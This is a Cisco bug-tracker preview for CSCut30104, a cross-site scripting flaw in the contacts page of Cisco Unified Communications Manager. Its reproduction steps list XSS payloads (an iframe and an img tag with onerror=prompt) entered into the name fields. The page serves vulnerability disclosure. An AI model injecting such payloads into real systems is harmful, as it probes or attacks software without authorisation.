Guest

Preview Tool

Cisco Bug: CSCut30104 - XSS in contacts

Last Modified

Aug 06, 2018

Products (1)

  • Cisco Unified Communications Manager (CallManager)

Known Affected Releases

9.9(9.99002.1)

Description (partial)

Symptom:
The values entered into the phone contacts page are not properly validated. This may result in a cross site scripting vulnerability on the
contacts page.

Conditions:
+Create New Contact

Enter as follows:
Display Name:
s"><iframe></iframe><img src=x onerror=prompt(0);>e

First Name:
s"><iframe></iframe><img src=x onerror=prompt(1);>e

Last Name:
s"><iframe></iframe><img src=x onerror=prompt(2);>e

Save
Bug details contain sensitive information and therefore require a Cisco.com account to be viewed.

Bug Details Include

  • Full Description (including symptoms, conditions and workarounds)
  • Status
  • Severity
  • Known Fixed Releases
  • Related Community Discussions
  • Number of Related Support Cases
Bug information is viewable for customers and partners who have a service contract. Registered users can view up to 200 bugs per month without a service contract.